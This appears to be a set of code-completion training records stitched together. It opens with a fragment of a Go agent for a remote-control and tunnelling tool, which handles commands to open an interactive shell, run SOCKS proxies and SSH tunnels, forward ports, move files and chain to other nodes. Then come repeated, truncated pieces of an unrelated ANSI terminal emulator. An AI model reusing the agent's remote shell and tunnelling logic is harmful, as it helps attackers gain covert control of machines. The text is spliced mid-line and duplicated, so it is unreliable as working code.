FileDataMap.Lock()
FileDataMap.Payload[slicenum] = AdminData.Info
FileDataMap.Unlock()
case "FORWARD":
TryForward(AdminData.Info, AdminData.Clientid)
case "FORWARDDATA":
ForwardConnMap.RLock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
} else {
PortFowardMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HandleForward(PortFowardMap.Payload[AdminData.Clientid], AdminData.Clientid)
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
}
PortFowardMap.Unlock()
}
ForwardConnMap.RUnlock()
case "FORWARDFIN":
ForwardConnMap.Lock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
ForwardConnMap.Payload[AdminData.Clientid].Close()
delete(ForwardConnMap.Payload, AdminData.Clientid)
}
ForwardConnMap.Unlock()
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
close(PortFowardMap.Payload[AdminData.Clientid])
}
delete(PortFowardMap.Payload, AdminData.Clientid)
}
}
PortFowardMap.Unlock()
case "REFLECTDATARESP":
ReflectConnMap.Lock()
ReflectConnMap.Payload[AdminData.Clientid].Write([]byte(AdminData.Info))
ReflectConnMap.Unlock()
case "REFLECTTIMEOUT":
fallthrough
case "REFLECTOFFLINE":
ReflectConnMap.Lock()
if _, ok := ReflectConnMap.Payload[AdminData.Clientid]; ok {
ReflectConnMap.Payload[AdminData.Clientid].Close()
delete(ReflectConnMap.Payload, AdminData.Clientid)
}
ReflectConnMap.Unlock()
case "FINOK":
SocksDataChanMap.Lock() //性能损失?
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "FIN":
CurrentConn.Lock()
if _, ok := CurrentConn.Payload[AdminData.Clientid]; ok {
CurrentConn.Payload[AdminData.Clientid].Close()
delete(CurrentConn.Payload, AdminData.Clientid)
}
CurrentConn.Unlock()
SocksDataChanMap.Lock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "HEARTBEAT":
hbdatapack, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "KEEPALIVE", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- hbdatapack
default:
continue
}
case "COMMAND":
switch AdminData.Command {
case "SHELL":
switch AdminData.Info {
case "":
stdout, stdin = CreatInteractiveShell()
go func() {
StartShell("", stdin, stdout, NODEID)
}()
case "exit\n":
fallthrough
default:
go func() {
StartShell(AdminData.Info, stdin, stdout, NODEID)
}()
}
case "SOCKS":
socksinfo := strings.Split(AdminData.Info, ":::")
SocksInfo.SocksUsername = socksinfo[1]
SocksInfo.SocksPass = socksinfo[2]
StartSocks()
case "SOCKSOFF":
case "SSH":
err := StartSSH(AdminData.Info, NODEID)
if err == nil {
go ReadCommand()
} else {
break
}
case "SSHCOMMAND":
go WriteCommand(AdminData.Info)
case "SSHTUNNEL":
err := SSHTunnelNextNode(AdminData.Info, NODEID)
if err != nil {
fmt.Println("[*]", err)
break
}
case "CONNECT":
var status bool = false
command := strings.Split(AdminData.Info, ":::")
addr := command[0]
choice := command[1]
if choice == "1" { //连接的节点是否是在reuseport?
status = node.ConnectNextNodeReuse(addr, NODEID, AgentStatus.AESKey)
} else {
status = node.ConnectNextNode(addr, NODEID, AgentStatus.AESKey)
}
if !status {
message, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NODECONNECTFAIL", " ", "", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- message
}
case "FILENAME":
var err error
UploadFile, err := os.Create(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "CREATEFAIL", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NAMECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go share.ReceiveFile("", connToAdmin, FileDat | respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESIZECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSize <- true
case "FILESLICENUM":
share.File.TotalSilceNum, _ = strconv.Atoi(AdminData.Info)
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESLICENUMCONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSliceNum <- true
case "FILESLICENUMCONFIRM":
share.File.TotalConfirm <- true
case "FILESIZECONFIRM":
share.File.TotalConfirm <- true
case "DOWNLOADFILE":
go share.UploadFile("", AdminData.Info, connToAdmin, utils.AdminId, GetName, AgentStatus.AESKey, NODEID, false)
case "NAMECONFIRM":
GetName <- true
case "CREATEFAIL":
GetName <- false
case "CANNOTREAD":
CannotRead <- true
share.File.ReceiveFileSliceNum <- false
os.Remove(AdminData.Info) //删除空文件
case "FORWARDTEST":
go TestForward(AdminData.Info)
case "REFLECTTEST":
go TestReflect(AdminData.Info)
case "REFLECTNUM":
ReflectStatus.ReflectNum <- AdminData.Clientid
case "STOPREFLECT":
ReflectConnMap.Lock()
for key, conn := range ReflectConnMap.Payload {
conn.Close()
delete(ForwardConnMap.Payload, key)
}
ReflectConnMap.Unlock()
for _, listener := range CurrentPortReflectListener {
listener.Close()
}
case "LISTEN":
err := TestListen(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "FAILED", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "SUCCESS", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go node.StartNodeListen(AdminData.Info, NODEID, AgentStatus.AESKey)
}
case "YOURINFO": //接收note
AgentStatus.NodeNote = AdminData.Info
case "KEEPALIVE":
default:
continue
}
}
} else {
// 检查是否是admin发来的,分配给自己子节点的ID命令,是的话将admin分配的序号记录
if AdminData.Route == "" && AdminData.Command == "ID" {
AgentStatus.WaitForIDAllocate <- AdminData.NodeId //将此节点序号递交,以便启动HandleConnFromLowerNode函数
node.NodeInfo.LowerNode.Lock()
node.NodeInfo.LowerNode.Payload[AdminData.NodeId] = node.NodeInfo.LowerNode.Payload[utils.AdminId]
node.NodeInfo.LowerNode.Unlock()
}
routeid := ChangeRoute(AdminData) //更改路由并返回下一个路由点
proxyData, _ := utils.ConstructPayload(AdminData.NodeId, AdminData.Route, AdminData.Type, AdminData.Command, AdminData.FileSliceNum, AdminData.Info, AdminData.Clientid, AdminData.CurrentId, AgentStatus.AESKey, true)
passToLowerData := utils.NewPassToLowerNodeData()
if routeid == "" { //当返回的路由点为0,说明就是自己的子节点
passToLowerData.Route = AdminData.NodeId
} else { //不是0,说明不是自己的子节点,还需要一定轮数的递送
passToLowerData.Route = routeid
}
passToLowerData.Data = proxyData //封装结构体,交给HandleConnToLowerNode处理
ProxyChan.ProxyChanToLowerNode <- passToLowerData
}
}
}
| aMap, CannotRead, UploadFile, AgentStatus.AESKey, false, NODEID)
}
case "FILESIZE":
filesize, _ := strconv.ParseInt(AdminData.Info, 10, 64)
share.File.FileSize = filesize
| conditional_block |
console.go | package console
import (
"fmt"
"image"
"strconv"
"strings"
"github.com/hajimehoshi/ebiten/v2"
)
type color struct {
R byte
G byte
B byte
}
type char struct {
charID int
fgColor color
bgColor color
blink bool
}
type Console struct {
videoTextMemory [25 * 80]char
fgColor color
bgColor color
auxCursorPos int
cursor int
height int
width int
scale float64
cursorSetBlink bool
cursorBlinkTimer int
tmpScreen *ebiten.Image
img *image.RGBA
title string
font struct {
height int
width int
bitmap []byte
}
}
func (c *Console) Write(p []byte) (n int, err error) {
c.Print(string(p))
return len(p), nil
}
func colorParserFg(i int) (color, bool) {
fg := make(map[int]color, 16)
fg[30] = color{0, 0, 0} // Black
fg[31] = color{170, 0, 0} // Red
fg[32] = color{0, 170, 0} // Green
fg[33] = color{170, 85, 0} // Yellow
fg[34] = color{0, 0, 170} // Blue
fg[35] = color{170, 0, 170} // Magenta
fg[36] = color{0, 170, 170} // Cyan
fg[37] = color{170, 170, 170} // White
fg[90] = color{85, 85, 85} // Bright Black (Gray)
fg[91] = color{255, 85, 85} // Bright Red
fg[92] = color{85, 255, 85} // Bright Green
fg[93] = color{255, 255, 85} // Bright Yellow
fg[94] = color{85, 85, 255} // Bright Blue
fg[95] = color{255, 85, 255} // Bright Magenta
fg[96] = color{85, 255, 255} // Bright Cyan
fg[97] = color{255, 255, 255} // Bright White
c, ok := fg[i]
return c, ok
}
func colorParserBg(i int) (color, bool) {
bg := make(map[int]color, 16)
bg[40] = color{0, 0, 0} // Black
bg[41] = color{170, 0, 0} // Red
bg[42] = color{0, 170, 0} // Green
bg[43] = color{170, 85, 0} // Yellow
bg[44] = color{0, 0, 170} // Blue
bg[45] = color{170, 0, 170} // Magenta
bg[46] = color{0, 170, 170} // Cyan
bg[47] = color{170, 170, 170} // White
bg[100] = color{85, 85, 85} // Bright Black (Gray)
bg[101] = color{255, 85, 85} // Bright Red
bg[102] = color{85, 255, 85} // Bright Green
bg[103] = color{255, 255, 85} // Bright Yellow
bg[104] = color{85, 85, 255} // Bright Blue
bg[105] = color{255, 85, 255} // Bright Magenta
bg[106] = color{85, 255, 255} // Bright Cyan
bg[107] = color{255, 255, 255} // Bright White
c, ok := bg[i]
return c, ok
}
func New() *Console {
c := &Console{}
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
c.width = 80 * 9
c.height = 25 * 16
c.scale = 1.5
c.title = "term"
c.cursorSetBlink = true
c.img = image.NewRGBA(image.Rect(0, 0, c.width, c.height))
c.tmpScreen = ebiten.NewImage(c.width, c.height)
c.font.bitmap = bitmap
c.font.height = 16
c.font.width = 9
c.clear()
return c
}
func (c *Console) Run() (err error) {
// SetRunnableOnUnfocused
ebiten.SetRunnableOnUnfocused(true)
ebiten.SetWindowSize(c.width, c.height)
ebiten.SetWindowTitle(c.title)
err = ebiten.RunGame(c)
return err
}
func (c *Console) input() {
var r rune
for c := 'A'; c <= 'Z'; c++ {
if ebiten.IsKeyPressed(ebiten.Key(c) - 'A' + ebiten.KeyA) {
if ebiten.IsKeyPressed(ebiten.KeyShift) {
r = c
}
r = (c + 32) // convert to lowercase
fmt.Println(string(r))
}
}
}
func (c *Console) Update() error {
c.input()
c.drawText()
return nil
}
func (c *Console) Layout(outsideWidth, outsideHeight int) (int, int) {
return c.width, c.height
}
func (c *Console) Draw(screen *ebiten.Image) {
c.tmpScreen.ReplacePixels(c.img.Pix)
screen.DrawImage(c.tmpScreen, nil)
}
func (c *Console) clear() {
c.cursor = 0
for i := 0; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) drawText() {
i := 0
rows := 25
columns := 80
for row := 0; row < rows; row++ {
for col := 0; col < columns; col++ {
v := c.videoTextMemory[i]
if i == c.cursor {
c.drawCursor(v.charID, v.fgColor, v.bgColor, col, row)
} else {
c.drawChar(v.charID, v.fgColor, v.bgColor, col, row)
}
i++
}
}
}
func (c *Console) moveUp() {
columns := 80
copy(c.videoTextMemory[0:], c.videoTextMemory[columns:])
for i := len(c.videoTextMemory) - columns; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) put(charID int) {
c.videoTextMemory[c.cursor].fgColor = c.fgColor
c.videoTextMemory[c.cursor].bgColor = c.bgColor
c.videoTextMemory[c.cursor].charID = charID
c.cursor++
c.cursorLimit()
}
func (c *Console) cursorLimit() {
if c.cursor < 0 {
c.cursor = 0
return
}
columns := 80
rows := 25
for c.cursor >= rows*columns {
c.cursor -= columns
c.moveUp()
}
}
func (c *Console) Print(msg string) {
columns := 80
parseMode := false
csi := false
s := ""
for i := 0; i < len(msg); i++ {
v := msg[i]
switch {
case v == 7: // bell
// not implemented
case v == 8: // Backspace
c.cursor--
c.cursorLimit()
case v == 9: // tab \t
lin := int(c.cursor / columns)
col := int(c.cursor % columns)
ncol := int(col/4)*4 + 4 // tab size 4 and remove mod
c.cursor = lin*columns + ncol
c.cursorLimit()
case v == 10: // Line Feed, \n
c.cursor += columns
c.cursorLimit()
case v == 11: // Vertical tab
// not implemented
case v == 12: // Formfeed
// not implemented
case v == 13: // Carriage return \r
c.cursor = int(c.cursor/columns) * columns
c.cursorLimit()
case v == 27:
parseMode = true
case v == '7' && parseMode: // DEC primitive save cursor position
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == '8' && parseMode: // DEC primitive restore cursor position
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == '[' && parseMode: // Control Sequence Introducer
csi = true
s = ""
case v == 'c' && csi: // Reset display to initial state
c.clear()
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
parseMode = false
csi = false
continue
case v == 'm' && csi:
sv := strings.Split(s, ";")
//bold := false
for _, j := range sv {
if j == "" {
continue
} else if j == "0" {
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
continue
} else if j == "1" {
//bool = true
continue
} else if j == "39" { // Default foreground color
c.fgColor, _ = colorParserFg(37)
continue
} else if j == "49" { // Default background color
c.bgColor, _ = colorParserBg(37)
continue
} else {
i, err := strconv.Atoi(j)
if err != nil {
fmt.Println(err, "code:", s)
continue
}
fgColor, ok := colorParserFg(i)
if ok {
c.fgColor = fgColor
continue
}
bgColor, ok := colorParserBg(i)
if ok {
c.bgColor = bgColor
continue
}
fmt.Println("ANSI code not implemented:", i)
}
}
parseMode = false
csi = false
case v == 'd' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
cpos := i * columns
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 's' && csi:
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == 'u' && csi:
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == 'A' && csi: // Cursor up
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'B' && csi: // Cursor down
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil |
}
c.cursor += i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'C' && csi: // Cursor forward
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i
c.cursorLimit()
parseMode = false
csi = false
case v == 'D' && csi: // Cursor back
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i
c.cursorLimit()
parseMode = false
csi = false
case v == 'G' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
lin := int(c.cursor / columns)
cpos := lin*columns + i
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 'f' && csi: // the same as H
fallthrough
case v == 'H' && csi: // set horizontal and vertical position
if s == "" {
c.cursor = 0
} else {
sv := strings.Split(s, ";")
if len(sv) == 2 {
lin, _ := strconv.Atoi(sv[0])
col, _ := strconv.Atoi(sv[1])
cpos := lin*columns + col
if cpos <= 2000 { // 25*80
c.cursor = cpos
}
}
}
parseMode = false
csi = false
case v == 'X' && csi: // Erase n characters from the current position
cpos := c.cursor
i := 1
if s != "" {
i, _ = strconv.Atoi(s)
}
for x := 1; x <= i; x++ {
if cpos+x < 2000 {
c.videoTextMemory[cpos+x].charID = ' '
}
}
c.cursor = cpos
parseMode = false
csi = false
case v == 'J' && csi:
if len(s) > 0 {
if s[0] == '2' {
c.clear()
}
}
parseMode = false
csi = false
case v >= 'a' &&
v <= 'z' &&
v <= 'A' &&
v <= 'Z' &&
parseMode:
parseMode = false
csi = false
case csi || parseMode:
s += string(v)
default:
c.put(int(msg[i]))
}
}
}
func (c *Console) set(x, y int, color color) {
p := 4*y*c.width + 4*x
c.img.Pix[p] = color.R
c.img.Pix[p+1] = color.G
c.img.Pix[p+2] = color.B
c.img.Pix[p+3] = 0xff
}
func (c *Console) drawCursor(index int, fgColor, bgColor color, x, y int) {
if c.cursorSetBlink {
if c.cursorBlinkTimer < 15 {
fgColor, bgColor = bgColor, fgColor
}
c.drawChar(index, fgColor, bgColor, x, y)
c.cursorBlinkTimer++
if c.cursorBlinkTimer > 30 {
c.cursorBlinkTimer = 0
}
return
}
c.drawChar(index, bgColor, fgColor, x, y)
}
func (c *Console) drawChar(index int, fgColor, bgColor color, x, y int) {
var (
a int
b int
lColor color
)
x = x * 9
y = y * 16
for b = 0; b < 16; b++ {
for a = 0; a < 9; a++ {
if a == 8 {
color := bgColor
if index >= 192 && index <= 223 {
color = lColor
}
c.set(a+x, b+y, color)
continue
}
i := index*16 + b
if bitmap[i]&(0x80>>a) != 0 {
lColor = fgColor
c.set(a+x, b+y, lColor)
continue
}
lColor = bgColor
c.set(a+x, b+y, lColor)
}
}
}
| {
fmt.Println(err)
} | conditional_block |
console.go | package console
import (
"fmt"
"image"
"strconv"
"strings"
"github.com/hajimehoshi/ebiten/v2"
)
type color struct {
R byte
G byte
B byte
}
type char struct {
charID int
fgColor color
bgColor color
blink bool
}
type Console struct {
videoTextMemory [25 * 80]char
fgColor color
bgColor color
auxCursorPos int
cursor int
height int
width int
scale float64
cursorSetBlink bool
cursorBlinkTimer int
tmpScreen *ebiten.Image
img *image.RGBA
title string
font struct {
height int
width int
bitmap []byte
}
}
func (c *Console) Write(p []byte) (n int, err error) {
c.Print(string(p))
return len(p), nil
}
func colorParserFg(i int) (color, bool) {
fg := make(map[int]color, 16)
fg[30] = color{0, 0, 0} // Black
fg[31] = color{170, 0, 0} // Red
fg[32] = color{0, 170, 0} // Green
fg[33] = color{170, 85, 0} // Yellow
fg[34] = color{0, 0, 170} // Blue
fg[35] = color{170, 0, 170} // Magenta
fg[36] = color{0, 170, 170} // Cyan
fg[37] = color{170, 170, 170} // White
fg[90] = color{85, 85, 85} // Bright Black (Gray)
fg[91] = color{255, 85, 85} // Bright Red
fg[92] = color{85, 255, 85} // Bright Green
fg[93] = color{255, 255, 85} // Bright Yellow
fg[94] = color{85, 85, 255} // Bright Blue
fg[95] = color{255, 85, 255} // Bright Magenta
fg[96] = color{85, 255, 255} // Bright Cyan
fg[97] = color{255, 255, 255} // Bright White
c, ok := fg[i]
return c, ok
}
func colorParserBg(i int) (color, bool) {
bg := make(map[int]color, 16)
bg[40] = color{0, 0, 0} // Black
bg[41] = color{170, 0, 0} // Red
bg[42] = color{0, 170, 0} // Green
bg[43] = color{170, 85, 0} // Yellow
bg[44] = color{0, 0, 170} // Blue
bg[45] = color{170, 0, 170} // Magenta
bg[46] = color{0, 170, 170} // Cyan
bg[47] = color{170, 170, 170} // White
bg[100] = color{85, 85, 85} // Bright Black (Gray)
bg[101] = color{255, 85, 85} // Bright Red
bg[102] = color{85, 255, 85} // Bright Green
bg[103] = color{255, 255, 85} // Bright Yellow
bg[104] = color{85, 85, 255} // Bright Blue
bg[105] = color{255, 85, 255} // Bright Magenta
bg[106] = color{85, 255, 255} // Bright Cyan
bg[107] = color{255, 255, 255} // Bright White
c, ok := bg[i]
return c, ok
}
| c.fgColor, _ = colorParserFg(37)
c.width = 80 * 9
c.height = 25 * 16
c.scale = 1.5
c.title = "term"
c.cursorSetBlink = true
c.img = image.NewRGBA(image.Rect(0, 0, c.width, c.height))
c.tmpScreen = ebiten.NewImage(c.width, c.height)
c.font.bitmap = bitmap
c.font.height = 16
c.font.width = 9
c.clear()
return c
}
func (c *Console) Run() (err error) {
// SetRunnableOnUnfocused
ebiten.SetRunnableOnUnfocused(true)
ebiten.SetWindowSize(c.width, c.height)
ebiten.SetWindowTitle(c.title)
err = ebiten.RunGame(c)
return err
}
func (c *Console) input() {
var r rune
for c := 'A'; c <= 'Z'; c++ {
if ebiten.IsKeyPressed(ebiten.Key(c) - 'A' + ebiten.KeyA) {
if ebiten.IsKeyPressed(ebiten.KeyShift) {
r = c
}
r = (c + 32) // convert to lowercase
fmt.Println(string(r))
}
}
}
func (c *Console) Update() error {
c.input()
c.drawText()
return nil
}
func (c *Console) Layout(outsideWidth, outsideHeight int) (int, int) {
return c.width, c.height
}
func (c *Console) Draw(screen *ebiten.Image) {
c.tmpScreen.ReplacePixels(c.img.Pix)
screen.DrawImage(c.tmpScreen, nil)
}
func (c *Console) clear() {
c.cursor = 0
for i := 0; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) drawText() {
i := 0
rows := 25
columns := 80
for row := 0; row < rows; row++ {
for col := 0; col < columns; col++ {
v := c.videoTextMemory[i]
if i == c.cursor {
c.drawCursor(v.charID, v.fgColor, v.bgColor, col, row)
} else {
c.drawChar(v.charID, v.fgColor, v.bgColor, col, row)
}
i++
}
}
}
func (c *Console) moveUp() {
columns := 80
copy(c.videoTextMemory[0:], c.videoTextMemory[columns:])
for i := len(c.videoTextMemory) - columns; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) put(charID int) {
c.videoTextMemory[c.cursor].fgColor = c.fgColor
c.videoTextMemory[c.cursor].bgColor = c.bgColor
c.videoTextMemory[c.cursor].charID = charID
c.cursor++
c.cursorLimit()
}
func (c *Console) cursorLimit() {
if c.cursor < 0 {
c.cursor = 0
return
}
columns := 80
rows := 25
for c.cursor >= rows*columns {
c.cursor -= columns
c.moveUp()
}
}
func (c *Console) Print(msg string) {
columns := 80
parseMode := false
csi := false
s := ""
for i := 0; i < len(msg); i++ {
v := msg[i]
switch {
case v == 7: // bell
// not implemented
case v == 8: // Backspace
c.cursor--
c.cursorLimit()
case v == 9: // tab \t
lin := int(c.cursor / columns)
col := int(c.cursor % columns)
ncol := int(col/4)*4 + 4 // tab size 4 and remove mod
c.cursor = lin*columns + ncol
c.cursorLimit()
case v == 10: // Line Feed, \n
c.cursor += columns
c.cursorLimit()
case v == 11: // Vertical tab
// not implemented
case v == 12: // Formfeed
// not implemented
case v == 13: // Carriage return \r
c.cursor = int(c.cursor/columns) * columns
c.cursorLimit()
case v == 27:
parseMode = true
case v == '7' && parseMode: // DEC primitive save cursor position
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == '8' && parseMode: // DEC primitive restore cursor position
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == '[' && parseMode: // Control Sequence Introducer
csi = true
s = ""
case v == 'c' && csi: // Reset display to initial state
c.clear()
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
parseMode = false
csi = false
continue
case v == 'm' && csi:
sv := strings.Split(s, ";")
//bold := false
for _, j := range sv {
if j == "" {
continue
} else if j == "0" {
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
continue
} else if j == "1" {
//bool = true
continue
} else if j == "39" { // Default foreground color
c.fgColor, _ = colorParserFg(37)
continue
} else if j == "49" { // Default background color
c.bgColor, _ = colorParserBg(37)
continue
} else {
i, err := strconv.Atoi(j)
if err != nil {
fmt.Println(err, "code:", s)
continue
}
fgColor, ok := colorParserFg(i)
if ok {
c.fgColor = fgColor
continue
}
bgColor, ok := colorParserBg(i)
if ok {
c.bgColor = bgColor
continue
}
fmt.Println("ANSI code not implemented:", i)
}
}
parseMode = false
csi = false
case v == 'd' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
cpos := i * columns
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 's' && csi:
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == 'u' && csi:
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == 'A' && csi: // Cursor up
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'B' && csi: // Cursor down
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'C' && csi: // Cursor forward
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i
c.cursorLimit()
parseMode = false
csi = false
case v == 'D' && csi: // Cursor back
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i
c.cursorLimit()
parseMode = false
csi = false
case v == 'G' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
lin := int(c.cursor / columns)
cpos := lin*columns + i
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 'f' && csi: // the same as H
fallthrough
case v == 'H' && csi: // set horizontal and vertical position
if s == "" {
c.cursor = 0
} else {
sv := strings.Split(s, ";")
if len(sv) == 2 {
lin, _ := strconv.Atoi(sv[0])
col, _ := strconv.Atoi(sv[1])
cpos := lin*columns + col
if cpos <= 2000 { // 25*80
c.cursor = cpos
}
}
}
parseMode = false
csi = false
case v == 'X' && csi: // Erase n characters from the current position
cpos := c.cursor
i := 1
if s != "" {
i, _ = strconv.Atoi(s)
}
for x := 1; x <= i; x++ {
if cpos+x < 2000 {
c.videoTextMemory[cpos+x].charID = ' '
}
}
c.cursor = cpos
parseMode = false
csi = false
case v == 'J' && csi:
if len(s) > 0 {
if s[0] == '2' {
c.clear()
}
}
parseMode = false
csi = false
case v >= 'a' &&
v <= 'z' &&
v <= 'A' &&
v <= 'Z' &&
parseMode:
parseMode = false
csi = false
case csi || parseMode:
s += string(v)
default:
c.put(int(msg[i]))
}
}
}
func (c *Console) set(x, y int, color color) {
p := 4*y*c.width + 4*x
c.img.Pix[p] = color.R
c.img.Pix[p+1] = color.G
c.img.Pix[p+2] = color.B
c.img.Pix[p+3] = 0xff
}
func (c *Console) drawCursor(index int, fgColor, bgColor color, x, y int) {
if c.cursorSetBlink {
if c.cursorBlinkTimer < 15 {
fgColor, bgColor = bgColor, fgColor
}
c.drawChar(index, fgColor, bgColor, x, y)
c.cursorBlinkTimer++
if c.cursorBlinkTimer > 30 {
c.cursorBlinkTimer = 0
}
return
}
c.drawChar(index, bgColor, fgColor, x, y)
}
func (c *Console) drawChar(index int, fgColor, bgColor color, x, y int) {
var (
a int
b int
lColor color
)
x = x * 9
y = y * 16
for b = 0; b < 16; b++ {
for a = 0; a < 9; a++ {
if a == 8 {
color := bgColor
if index >= 192 && index <= 223 {
color = lColor
}
c.set(a+x, b+y, color)
continue
}
i := index*16 + b
if bitmap[i]&(0x80>>a) != 0 {
lColor = fgColor
c.set(a+x, b+y, lColor)
continue
}
lColor = bgColor
c.set(a+x, b+y, lColor)
}
}
} | func New() *Console {
c := &Console{}
c.bgColor, _ = colorParserBg(40) | random_line_split |
console.go | package console
import (
"fmt"
"image"
"strconv"
"strings"
"github.com/hajimehoshi/ebiten/v2"
)
type color struct {
R byte
G byte
B byte
}
type char struct {
charID int
fgColor color
bgColor color
blink bool
}
type Console struct {
videoTextMemory [25 * 80]char
fgColor color
bgColor color
auxCursorPos int
cursor int
height int
width int
scale float64
cursorSetBlink bool
cursorBlinkTimer int
tmpScreen *ebiten.Image
img *image.RGBA
title string
font struct {
height int
width int
bitmap []byte
}
}
func (c *Console) Write(p []byte) (n int, err error) {
c.Print(string(p))
return len(p), nil
}
func colorParserFg(i int) (color, bool) {
fg := make(map[int]color, 16)
fg[30] = color{0, 0, 0} // Black
fg[31] = color{170, 0, 0} // Red
fg[32] = color{0, 170, 0} // Green
fg[33] = color{170, 85, 0} // Yellow
fg[34] = color{0, 0, 170} // Blue
fg[35] = color{170, 0, 170} // Magenta
fg[36] = color{0, 170, 170} // Cyan
fg[37] = color{170, 170, 170} // White
fg[90] = color{85, 85, 85} // Bright Black (Gray)
